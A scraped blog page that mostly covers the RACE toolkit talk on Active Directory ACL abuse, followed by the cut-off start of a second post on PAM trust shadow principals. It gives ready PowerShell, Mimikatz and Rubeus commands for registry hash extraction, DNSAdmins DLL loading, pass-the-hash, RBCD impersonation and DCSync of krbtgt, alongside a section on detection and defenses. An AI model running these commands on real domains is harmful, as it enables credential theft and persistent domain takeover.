<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiKZNAvnBwOHeoxv4oeJzevkFOjy3QQfF8o8wtPJUh1SoeNO9ozuPmsq9Rp-SL1RfkI2xM_xzO5sS1LqYAFmr7_6zfJeX9glJzmV3lfHrPKy0059USSaG0K-b22vcM3jD2unleVLEG6jA/s1600/JEA-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="814" data-original-width="1098" height="296" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhiKZNAvnBwOHeoxv4oeJzevkFOjy3QQfF8o8wtPJUh1SoeNO9ozuPmsq9Rp-SL1RfkI2xM_xzO5sS1LqYAFmr7_6zfJeX9glJzmV3lfHrPKy0059USSaG0K-b22vcM3jD2unleVLEG6jA/s400/JEA-2.png" width="400" /></a></div>
Neat, isn't it!<br />
<br />
Below is a video of the attack:<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/D7mgKfPdxOg" width="560"></iframe><br />
<br />
<br />
Please note that there are no logs for new session registration. But, there are Events 4624, 4634 and 4717 when we access the target machine. Alos, keep in mind the PowerShell logs.<br />
<br />
The best way to avoid against JEA abuse really is to audit the registered session configurations and role capabilities. A good guidance on <a href="https://docs.microsoft.com/en-us/powershell/jea/audit-and-report">audit and report on JEA is here</a>. </div>
<div style="text-align: justify;">
</div>
<br />
<div style="text-align: justify;">
<h4>
Persistence - Registry</h4>
</div>
<div style="text-align: justify;">
Windows registry stores many interesting credentials - Machine account, Local users and Cached domain credentials. By modifying the ACL for the registry keys where we store these credentials, it is possible to access these credentials without needing admin privileges later on. We need to modify permissions of the following registry keys:<br />
- HKLM:\ SYSTEM\CurrentControlSet\Control\Lsa\ <br />
- HKLM:\Security\ <br />
- HKLM:\SAM\<br />
<br />
Once we have modified the ACLs of these keys, we can then modify ACL of Remote registyr, WMI or PowerShell Remoting to access the machine and extract the credentials.<br />
<br />
RACE uses code from the <a href="https://github.com/HarmJ0y/DAMP/">DAMP toolkit</a> for this:<br />
<br />
Use the below command to modify the permissions of the above registry keys and remote registry. We are targeting a DC so need DA privileges.:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Add-RemoteRegBackdoor -ComputerName ops-dc -Trustee labuser -Verbose
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU5O-l5nGUP337RWj0FYcKHPqdXudd7EJXrCONs5xTqn9hQEfU5Zz7hjGWq3RHIy9jXXuVZT7tUBKR2SAe5ptcYiUWOs4XqttsgWDMQMND3XPKkzoaxkVG43l9crQsygpvv8u4BHAp_IY/s1600/DAMP-DC.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="382" data-original-width="1439" height="105" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU5O-l5nGUP337RWj0FYcKHPqdXudd7EJXrCONs5xTqn9hQEfU5Zz7hjGWq3RHIy9jXXuVZT7tUBKR2SAe5ptcYiUWOs4XqttsgWDMQMND3XPKkzoaxkVG43l9crQsygpvv8u4BHAp_IY/s400/DAMP-DC.png" width="400" /></a></div>
Now, use the below command to extract the machine account hash (uses remote registry):<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Get-RemoteMachineAccountHash -ComputerName ops-dc -Verbose
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCRuSZJkxgK2BhqbREbAS18SWXHt86nUh_2GUYa-IOgaax_fc_ZYAOKg-drf2LiKkLx5nrVEuNAuoY1jCozMSayau9HgFsk4hWrTzxqhUQRVYUKXdskzngCO9rHGalZu7uFtpdKICq5PM/s1600/DAMP-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="180" data-original-width="1026" height="70" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhCRuSZJkxgK2BhqbREbAS18SWXHt86nUh_2GUYa-IOgaax_fc_ZYAOKg-drf2LiKkLx5nrVEuNAuoY1jCozMSayau9HgFsk4hWrTzxqhUQRVYUKXdskzngCO9rHGalZu7uFtpdKICq5PM/s400/DAMP-labuser.png" width="400" /></a></div>
ICYMI, machine account of DC can run the DCSync attack!<br />
<br />
Use the Get-RemoteLocalAccountHash function to ectract local acccount hashes. In case of the DC, this gives the NTLM hash of the DSRM account<a href="https://www.blogger.com/null">!</a><br />
<br />
<br />
Remeber that we left a question - how modifying ACLs of PSRemoting is useful? This is a very good example. in case you cannot access remote registry (for example, filtered on firewall), you can modify the ACL of PSRemoting and the Registry keys and extract the secrets from the DC without admin privileges:<br />
<pre><textarea cols="70" readonly="readonly" rows="6" style="background-color: #012456; color: white;">$opsdc = New-PSSession -ComputerName ops-dc
Invoke-Command -FilePath C:\RACE-master\RACE.ps1 -Session $opsdc
Enter-PSSession $opsdc
Get-RemoteMachineAccountHash
</textarea></pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGmTfBFZbIDa0UxNvws3qOsUUW8KqBxqLv6z04fAAiWgKnJvMiMP4oUj1RnFqwoRUWpbzvXpImZqmm0VyFNhyiVYa2cY5wEZBVKVicZsUtR3ImFyUhCOo9midSqYFZKa457jCTanMBio/s1600/DAMP-labuser-RACE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="222" data-original-width="889" height="98" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEieGmTfBFZbIDa0UxNvws3qOsUUW8KqBxqLv6z04fAAiWgKnJvMiMP4oUj1RnFqwoRUWpbzvXpImZqmm0VyFNhyiVYa2cY5wEZBVKVicZsUtR3ImFyUhCOo9midSqYFZKa457jCTanMBio/s400/DAMP-labuser-RACE.png" width="400" /></a></div>
Sweet!<br />
Below is a video of the attack:<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/nHhebfX78B0" width="560"></iframe><br />
<br />
Note that there is no log for change in permission of the registry keys. But as for the other attacks, there will be 4624 and 4634 log entries when accessing the DC.<br />
<br />
<h4>
On demand Privilege Escalation on DC - DNSAdmins</h4>
DNSAdmins is an AD security group which has the capability to load arbitrary DLLs from a UNC path in the DNS service. See <a href="https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83">this post</a> and <a href="http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html">my post</a>. This group is effectively DA equivalent if DNS service is running on a DC.<br />
<br />
The group has Read, Write, Create All Child objects, Delete Child objects, Special Permissions on the DNS Server object. We can either:<br />
- Modify ACL of the DNS Server object to have the same rights as the DNSAdmins group to abuse the DLL configuration feature.<br />
<br />
or<br />
<br />
- Modify the ACL of the DNSAdmins group because it is not a Protected Group (ACL not protected by AdminSDHolder)<br />
<br />
Let's modify the ACL of the DNS Server object to be able to load DLL remotely and also provide service start and stop rights on the DNS service for a user we control. Use the below command:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">Set-DNSAbusePermissions -SAMAccountName labuser -DistinguishedName 'CN=MicrosoftDNS,CN=System,DC=offensiveps,DC=powershell,DC=local' -ComputerName ops-dc -Verbose
</textarea></pre>
Now, use the below command as labuser to load mimilib.dll from Mimikatz to load the DLL in DNS Service. Please note that the DNSServer module from DNS RSAT is required for the below command:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-DNSAbuse -ComputerName ops-dc -DLLPath \\ops-build\dll\mimilib.dll -Verbose
</textarea></pre>
</div>
<br />
<h4>
On demand Privilege Escalation on DC - DSRM Administrator </h4>
<div style="text-align: justify;">
DSRM administrator is a special 'local administrator' account on a DC. This is <a href="https://adsecurity.org/?p=1785">very useful for persistence</a> as it is seldom changed. By default, this user cannot logon from network. But this logon behavior can be changed by modifying the registry key - HKLM:\System\CurrentControlSet\Control\Lsa\DsrmAdminLogonBehavior and set its value to 2.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This means, once we have DA privileges, we can:</div>
<div style="text-align: justify;">
- Extract the hash for DSRM administrator (Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"') or we can also chain this with modification of registry keys, as discussed previously, to obtain the DSRM hash without admin privileges. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
- Modify the permissions of the above registry key so that a user we control can change it on demand.</div>
<div style="text-align: justify;">
- Use Mimikatz PTH to connect to the DC.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Lets try it. Run the below command to modify the DSRMLogonBehavior registry key and allow labuser to modify it anytime. If the key doesn't exist, it is created:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCPermissions -Method DSRMAdmin -SAMAccountName labuser -Server ops-dc -Verbose
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOec03j_OhywX0eXBaXewBO_dDOKXYUWF37PWjg-rswlm6QwDK5fne_Q9Q6_x022xdFeTHfd5itEKyWFiSu977gGbylb7OMb-rO976QWcPBfN1Ng-Q31uyT8o9s7PWz-SdKpdl8LnHiQ0/s1600/DSRM-DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="145" data-original-width="1563" height="36" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhOec03j_OhywX0eXBaXewBO_dDOKXYUWF37PWjg-rswlm6QwDK5fne_Q9Q6_x022xdFeTHfd5itEKyWFiSu977gGbylb7OMb-rO976QWcPBfN1Ng-Q31uyT8o9s7PWz-SdKpdl8LnHiQ0/s400/DSRM-DA.png" width="400" /></a></div>
As labuser, we can modify the registry key. Note that this needs to be coupled with modification of ACL of a remote access method (PSRemoting, WMI, Remote Registry or DCOM). Let's use PSRemoting for that:</div>
<div style="text-align: justify;">
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa\" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
</textarea></pre>
</div>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTG-j4sCC3vNrRoC7LKOGkuaLpgdctHOIuwmAaeFOKpYajg0VKeLwtzXRTSxio7uUpJpDm_barP677jvOtJwo4zdrM0cWDnDhwor_tIS_lbK6BdWF-SyQlRPTcw9lVxivKLN5Nuot6Mo/s1600/DSRM-User.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="86" data-original-width="1600" height="21" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTG-j4sCC3vNrRoC7LKOGkuaLpgdctHOIuwmAaeFOKpYajg0VKeLwtzXRTSxio7uUpJpDm_barP677jvOtJwo4zdrM0cWDnDhwor_tIS_lbK6BdWF-SyQlRPTcw9lVxivKLN5Nuot6Mo/s400/DSRM-User.png" width="400" /></a></div>
<br />
Now, we can use PTH (note the /domain parameter in the below command) to access the DC. We need to use NTLM authentication to access the DC as we are using a local account:</div>
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;">Invoke-Mimikatz -Command '"sekurlsa::pth /domain:ops-dc /user:Administrator /ntlm:<ntlmhash> /run:powershell.exe"'
Enter-PSSession ops-dc -Authentication Negotiate </textarea></pre>
<h4 style="text-align: left;">
Persistence using DC - Resource-based Constrained Delegation (RBCD)</h4>
<div style="text-align: justify;">
Resource-based Constrained Delegation enables the resource owner to set delegation to it. Unlike the traditional Delegation, DA privileges are not required to set RBCD.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
As per <a href="https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#generic-dacl-abuse">this post, for Generic DACL abuse</a> of RBCD, if a user we control has Write permissions on a computer object, that user can configure RBCD on the machine. This allows the ability to access the target machine as any user including DA. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Use the below command to give labuser permissions to configure RBCD on 'ops-file' by modifying the ACLs of ops-file computer object. This will need DA privileges:</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">Set-DCPermissions -Method RBCD -DistinguishedName 'CN=OPS-FILE,OU=Servers,DC=offensiveps,DC=powershell,DC=local' -SAMAccountName labuser -Verbose
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO6fe28BgMMGBVs8W27UygZ3YTPkjsdYR4Kx5vYgfGuRhAPSXcgUx7Io9GDTex-bO6_zisLRoV4w3vKToQJbYU8sKFzAtqxvRfIZneFu3hGClolepy0Uf6p96eE1YUxYRSxZSOPkCX3nU/s1600/RBCD-DA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="274" data-original-width="1600" height="67" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhO6fe28BgMMGBVs8W27UygZ3YTPkjsdYR4Kx5vYgfGuRhAPSXcgUx7Io9GDTex-bO6_zisLRoV4w3vKToQJbYU8sKFzAtqxvRfIZneFu3hGClolepy0Uf6p96eE1YUxYRSxZSOPkCX3nU/s400/RBCD-DA.png" width="400" /></a></div>
As labuser, run the below command (needs the ActiveDirectory module) to configure RBCD from attacker machine ops-user1$ to ops-file. This enables us to access ops-file as any user when we impersonate the ops-user1 machine:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-ADComputer -Identity ops-file -PrincipalsAllowedToDelegateToAccount ops-user1$
</textarea></pre>
<div style="text-align: justify;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR39s3XgB2_BxNrxhhNSDS7RlpU_5BSUn5AJrVLLwbhRmMgHfGA8AzhRo5kZG_XcBHK9r8zW-AvRQo_C6JTlgvSjE2ArxA0clctxin29dBuhaQdOqIVAu-RkN2Z3bxAN2JebST9jzgKBY/s1600/RBCD-labuser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="125" data-original-width="1600" height="30" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhR39s3XgB2_BxNrxhhNSDS7RlpU_5BSUn5AJrVLLwbhRmMgHfGA8AzhRo5kZG_XcBHK9r8zW-AvRQo_C6JTlgvSjE2ArxA0clctxin29dBuhaQdOqIVAu-RkN2Z3bxAN2JebST9jzgKBY/s400/RBCD-labuser.png" width="400" /></a></div>
We can extract the AES256 keys for the ops-user1$ account by dumping credetials on that machine (Invoke-Mimikatz -Command '"sekurlsa::ekeys"'). </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Now, we can use <a href="https://github.com/GhostPack/Rubeus/">Rubeus</a> to impersonate a DA which effectively means local admin on ops-file.</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">.\Rubeus.exe s4u /user:ops-user1$ /aes256:AES256KeyofUser1$ /msdsspn:cifs/ops-file /impersonateuser:administrator /ptt
</textarea></pre>
<div style="text-align: justify;">
Please note that we are merely impersonating the DA for accessing ops-file. We cannot access any other machine from ops-file as DA. </div>
<br />
<h4 style="text-align: justify;">
Persistence using DC - Exchange Groups</h4>
<div style="text-align: justify;">
Exchange creates multiple groups on installation. Groups like Exchange Servers, Exchange Trusted Subsystem and Exchange Windows Permissions have interesting permissions. The groups are added in a new container 'Microsoft Exchange Security Groups'. </div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
None of the Exchange Groups is a protected group so we can modify their ACLs for persistence.</div>
<div style="text-align: justify;">
Let's target the Exchange Windows Permissions group which has WriteDACL permission on the domain object (or even forest root domain object depending on the installation).</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
In our example, we target the Exchange Windows Permissions group on the forest root powershell.local. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Using DA privileges (on forest root in this case), run the below command to provide labuser WriteDACL permissions on the Exchange Windows Permissions group:</div>
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">Set-DCPermissions -Method GroupDACL -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=powershell,DC=local' -SAMAccountName ops\labuser -Verbose
</textarea></pre>
<div style="text-align: justify;">
Now, as labuser, we modify the ACL of the Exchange Windows Permissions group and add WriteMember rights to labuser. Note that this is just one of the paths once we have WriteDACL on the group:<br />
<pre><textarea cols="70" readonly="readonly" rows="2" style="background-color: #012456; color: white;">Set-ADACL -SamAccountName ops\labuser -DistinguishedName 'CN=Exchange Windows Permissions,OU=Microsoft Exchange Security Groups,DC=powershell,DC=local' -GUIDRight WriteMember -Server powershell.local -Verbose
</textarea></pre>
</div>
Next, add labuser (or a proxy user) to the Exchange Windows Permissions group. Because of this group membership, labuser will have WriteDACL rights on the domain object of the forest root:<br />
<pre><textarea cols="70" readonly="readonly" rows="5" style="background-color: #012456; color: white;">$user = Get-ADUser -Identity labuser
$group = Get-ADGroup -Identity 'Exchange Windows Permissions' -Server powershell.local
Add-ADGroupMember -Identity $group -Members $user -Verbose
</textarea></pre>
Usig the WriteDACL rights with labuser, add DCSync rights for labuser:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-ADACL -SamAccountName ops\labuser -DistinguishedName 'DC=powershell,DC=local' -GUIDRight DCSync -Server ps-dc -Verbose
</textarea></pre>
Finally, run the DCSync attack:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Invoke-Mimikatz -Command '"lsadump::dcsync /user:ps\krbtgt /domain:powershell.local"'
</textarea></pre>
<br />
Below is a video of the attack:<br />
<iframe allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/sySINjLZzwk" width="560"></iframe><br />
<br />
<b>Other well known techqniues implemented in the RACE tookit are:</b><br />
<br />
<h4 style="text-align: left;">
AdminSDHolder</h4>
<div style="text-align: justify;">
<a href="https://adsecurity.org/?p=1906">ICYMI</a>, the ACL of the AdminSDHolder is overwritten on all Protected Groups by an automatic process called SDProp every 60 minutes. This means any changes we do to the ACL of AdminSDHolder will be propagated to all the Protected Groups too. Therefore, it is a very interesting persistence technique.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Use the below command as DA to add WriteDACL permissions for labuser on AdminSDHolder:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCPermissions -Method AdminSDHolder -SAMAccountName labuser -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' -Verbose
</textarea></pre>
This allows us to push whatever permissions we want on all the Protected Groups as labuser:<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-ADACL -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=offensiveps,DC=powershell,DC=local' -Principal labuser -Right GenericAll -Verbose
</textarea></pre>
<div style="text-align: justify;">
<h4>
DCSync</h4>
The most famous ACL abuse. We can modify the ACL of the domain object to provide DCSync rights to a user we control. Run the below as DA:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCPermissions -Method DCSync -SAMAccountName labuser -DistinguishedName 'DC=offensiveps,DC=powershell,DC=local' -Verbose
</textarea></pre>
<div style="text-align: justify;">
<br />
<h4>
DCShadow</h4>
</div>
<div style="text-align: justify;">
DCShadow provides very useful forest persistence. See <a href="https://www.dcshadow.com/">this</a> and <a href="https://www.labofapenetrationtester.com/2018/04/dcshadow.html">this</a>.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
With DA privileges on forest root and from a machine joined to forest root, run the following command to modify ACLs of multiple objects. This will allow to run DCShadow without DA:</div>
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: #012456; color: white;">Set-DCShadowPermissions -FakeDC ops-user1 -SAMAccountName serviceuser -Username labuser -Verbose
</textarea></pre>
<div style="text-align: justify;">
The above command modifies ACLs for:</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The domain object.</div>
<div style="text-align: justify;">
- DS-Install-Replica (Add/Remove Replica in Domain)</div>
<div style="text-align: justify;">
- DS-Replication-Manage-Topology (Manage Replication Topology)</div>
<div style="text-align: justify;">
- DS-Replication-Synchronize (Replication Synchronization)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The Sites object (and its children) in the Configuration container.</div>
<div style="text-align: justify;">
- CreateChild and DeleteChild</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
The object of the computer which is registered as a DC - ops-user1 above.</div>
<div style="text-align: justify;">
</div>
<div style="text-align: justify;">
WriteProperty (Not GenericWrite)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The target object - serviceuser above </div>
<div style="text-align: justify;">
WriteProperty (Not GenericWrite)</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We can now run DCShadow against serviceuser from ops-user1 as labuser. </div>
<br />
<h4 style="text-align: left;">
Previous work</h4>
<div style="text-align: left;">
Directly taken from my talk slides:</div>
<div style="text-align: left;">
- ACL abuse is not something new, system administrators have been using this for so many years!</div>
<div style="text-align: left;">
- We can still see articles <a href="http://active-undelete.com/dcom-configuration.htm">from 2001 talking about setting Launch Permissions for DCOM</a>, for <a href="https://redmondmag.com/articles/2002/02/01/securing-remote-management-with-wmi.aspx">WMI from 2002</a> and so on. </div>
<div style="text-align: left;">
- (French) Chemins de contrôle en environnement Active Directory<br />
<a href="https://www.sstic.org/2014/presentation/chemins_de_controle_active_directory/">https://www.sstic.org/2014/presentation/chemins_de_controle_active_directory/</a></div>
<div style="text-align: left;">
- An ACE Up the Sleeve Designing Active Directory DACL Backdoors (DEF CON 25) <a href="https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf">https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEF%20CON%2025%20-%20Andrew-Robbins-and-Will-Schroeder-An-Ace-Up-The-Sleeve.pdf</a></div>
<br />
<h4 style="text-align: left;">
Defenses</h4>
<div style="text-align: justify;">
Protecting your privileged users is definitely the best defense.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Event logs</b> are also useful for detecting these attacks. While there are almost no logs for ACL changes in the default configuration, we can still use the security logs when someone accesses a target machine using Events 4624, 4634 and 4672 in case of admin logon. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
For ACL change logs, configure Auditing for ACL changes. See <a href="https://blogs.technet.microsoft.com/canitpro/2017/03/29/step-by-step-enabling-advanced-security-audit-policy-via-ds-access/">this technet article</a> for guidance. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
<b>Regular ACL auditing</b> is also useful in weeding out unnecessary or malicious ACEs. We can use tools like <a href="https://github.com/BloodHoundAD/BloodHound">BloodHound</a>, <a href="https://github.com/canix1/ADACLScanner">ADACLScanner</a> and <a href="https://github.com/vletoux/pingcastle">PingCastle</a> for that. </div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
A project I created <b><a href="https://github.com/samratashok/Deploy-Deception">Deploy-Deception</a></b>, can be used in creating accounts which have mis-configured ACLs and have verbose logging enabled. It is useful tricking an attacker in assuming they found object(s) with misconfigured ACLs</div>
<br />
<h4 style="text-align: left;">
Future Work</h4>
Directly taken from my talk slides:<br />
<br />
- Service Permissions are stored in Registry. So, that is a place ripe for abuse.<br />
- As noted earlier, WMI Permanent Event Consumer needs to be explored more.<br />
- For the RACE toolkit, work on hiding the ACE we introduce is highly desirable. Also, implementation of more Registry Autoruns! Currently, Remove option does not work for multiple functions. <br />
<br />
That is all! Hope you like it!</div>
<br />
<br />
Slides of the DEF CON 27 talk:<br />
<iframe allowfullscreen="" frameborder="0" height="485" marginheight="0" marginwidth="0" scrolling="no" src="//www.slideshare.net/slideshow/embed_code/key/LJXFDZ4KebYcnK" style="border-width: 1px; border: 1px solid #ccc; margin-bottom: 5px; max-width: 100%;" width="595"> </iframe> <br />
<div style="margin-bottom: 5px;">
<b> <a href="https://www.slideshare.net/nikhil_mittal/race-minimal-rights-and-ace-for-active-directory-dominance" target="_blank" title="RACE - Minimal Rights and ACE for Active Directory Dominance">RACE - Minimal Rights and ACE for Active Directory Dominance</a> </b> from <b><a href="https://www.slideshare.net/nikhil_mittal" target="_blank">Nikhil Mittal</a></b> </div>
<br />
<br />
<br />
<br /></div>
Nikhil SamratAshok Mittalhttp://www.blogger.com/profile/02092541175521734123noreply@blogger.com0tag:blogger.com,1999:blog-8135211063584500909.post-80552749585232021122019-04-18T09:05:00.000+05:302019-08-28T14:24:19.980+05:30How NOT to use the PAM trust - Leveraging Shadow Principals for Cross Forest Attacks<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: justify;">
I did a super interesting AD security assessment for a client recently. They are re-deploying their infrastructure and upgrading their forest(s) to Server 2016 Functional Level. There are so many interesting things which we did during the assessment but the most interesting for me was their attempt to establish Privileged Access Management (PAM) trust in an "interesting" way. It is a classic example of deploying something which sounds secure without actually understanding what it does. </div>
<div style="text-align: justify;">
<br />
Microsoft <a href="https://docs.microsoft.com/en-us/windows-server/identity/whats-new-active-directory-domain-services#a-namebkmkpamaprivileged-access-management">introduced</a> Privileged Access Management (PAM) with Server 2016. Among other things, it has very interesting features like -<br />
- A bastion forest (Think the administrative forest in <a href="https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#ESAE_BM">ESAE</a> or the famous Red Forest)<br />
- Shadow security principals<br />
- Temporary group membership (Add a user to a group with time-to-live (TTL))<br />
<br />
<h3>
</h3>
<h4>
So what is PAM? </h4>
<br />
PAM has been discussed in much detail <a href="https://www.petri.com/windows-server-2016-set-privileged-access-management">here by Russel</a> and <a href="https://blogs.technet.microsoft.com/389thoughts/2017/06/19/ad-2016-pam-trust-how-it-works-and-safety-advisory/">here by Willem</a>. Please read them for understanding what PAM has to offer. A quick explanation is below:<br />
<br />
In a perfect world, PAM enables managing an existing production/user forest using a bastion forest which has a one-way PAM trust with the existing forest. The users in the bastion forest can be 'mapped' to privileges groups like Domain Admins and Enterprise Admins in the user forest without modifying any group memberships or ACLs. This is done by creating Shadow security principals in the bastion forest, which are mapped to SIDs for high privilege groups in the user forest and then add users from the admin forest as members of the shadow security principals.<br />
<br />
<h4>
Example</h4>
<br />
Let's have a look at an example. We have powershell.local as our user forest and bastion.local as the bastion or admin forest. What we want to do it to be able to manage powershell.local from bastion.local without modifying any group membership or ACLs on powershell.local.<br />
<br />
A one way PAM trust can be established between the two forest using the commands below (taken from Petri article linked above) :<br />
On user forest (powershell.local in our example) -<br />
<pre><textarea cols="70" readonly="readonly" rows="13" style="background-color: black; color: white;">netdom trust powershell.local /Domain:bastion.local /Add /UserD:administrator@bastion.local /PasswordD:Password@123 /UserO:administrator@powershell.local /PasswordO:Password@123
netdom trust powershell.local /domain:bastion.local /ForestTransitive:Yes
netdom trust powershell.local /domain:bastion.local /EnableSIDHistory:Yes
netdom trust powershell.local /domain:bastion.local /EnablePIMTrust:Yes
netdom trust powershell.local /domain:bastion.local /Quarantine:No
</textarea></pre>
On bastion forest -<br />
<pre><textarea cols="70" readonly="readonly" rows="1" style="background-color: black; color: white;">netdom trust bastion.local /domain:powershell.local /ForestTransitive:Yes
</textarea></pre>
Shadow Principals reside in a special container 'CN=Shadow Principal Configuration' in the Configuration container on bastion forest. We can create Shadow security principals on bastion.local using the below PowerShell code:<br />
<pre><textarea cols="70" readonly="readonly" rows="10" style="background-color: #012456; color: white;"># Get the SID for the Enterprise Admins group of the existing forest
$ShadowPrincipalSid = (Get-ADGroup -Identity 'Enterprise Admins' -Properties ObjectSID -Server powershell.local).ObjectSID
# Container location
$Container = 'CN=Shadow Principal Configuration,CN=Services,CN=Configuration,DC=bastion,DC=local'
# Create the Shadow principal - note the type
New-ADObject -Type msDS-ShadowPrincipal -Name "psforest-ShadowEnterpriseAdmin" -Path $Container -OtherAttributes @{'msDS-ShadowPrincipalSid'= $ShadowPrincipalSid}
</textarea></pre>
In the above command we are mapping the SID of Enterprise Admins group of the user forest powershell.local to a Shadow security principal "psforest-ShadowEnterpriseAdmin". Please note that we can also map the shadow principal to a user in the user forest.<br />
<br />
Shadow Principals reside in a special container 'CN=Shadow Principal Configuration,CN=Services' under the Configuration container on bastion forest. We can create Shadow security principals on bastion.local using the below PowerShell code:<br />
<pre><textarea cols="70" readonly="readonly" rows="3" style="background-color: #012456; color: white;"># Add the DA of bastion forest to shadow principals thus providing Enterprise Admins privileges on existing forest
